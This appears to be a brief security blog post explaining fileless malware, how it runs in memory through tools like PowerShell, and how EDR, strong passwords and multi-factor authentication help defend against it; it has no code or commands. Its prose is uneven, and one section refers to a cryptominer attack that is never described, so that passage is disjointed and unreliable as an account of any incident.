December 11, 2023

In CyberSecurity with defensive tools and training pushing threat actors to adopt even more sophisticated and evasive intrusion techniques as they attempt to gain a foothold in victim networks. Endpoint protection (EPP) services are capable of easily identifying traditional malware payloads as they are downloaded and saved on the endpoint, which means attackers have now turned to  fileless  techniques that never touch the victim’s storage.

Understanding fileless malware

Fileless malware often start with a file. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim’s storage drive, fileless malware’s malicious actions reside solely in memory.

With traditional malware, deleting the executable means deleting the infection itself . This makes it easy for EPP solutions to quickly identify and clean up. Fileless malware, on the other hand, only uses the initial “dropper” file to open up a built-in system management tool like PowerShell and run a short script. It then hides from defensive tools by injecting its malicious code into other processes, all the while never touching the victim’s storage drive.

Fileless malware has become such a popular attack technique is that it is exceedingly difficult to accurately identify and block the initial stages of these attacks without accidently triggering false positives and preventing the same tools from carrying out legitimate activities.

Examining prime method

Fileless malware starts with some form of dropper file, more evasive variants exist that truly don’t require a file. They generally originate in one of two ways, either exploiting a code execution vulnerability in an application or by using stolen credentials to abuse a network-connected application’s capabilities to run system commands.

Fending off fileless malware

Identifying the intrusion through a variety of methods including evaluating its process behavior and recognizing the cryptominer. Since the threat actor never touched victim’s server storage drive throughout the course of this entire attack, endpoint defenses that only monitor files would have missed it entirely.

Moving forward Fileless malware usage will see a steady growth as tools like PowerSploit make it easy to launch evasive attacks. To combat the threat, focus on deploying EPP and Endpoint Detection and Response (EDR) security solutions capable of identifying indicators that exist solely in memory.

It’s critical that strong password policies been strongly in use backed by multi-factor authentication wherever possible to prevent credential theft from initiating an attack. Combined, these strategies can help to significantly reduce your risk of sustaining a breach due to fileless malware beyond the network.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.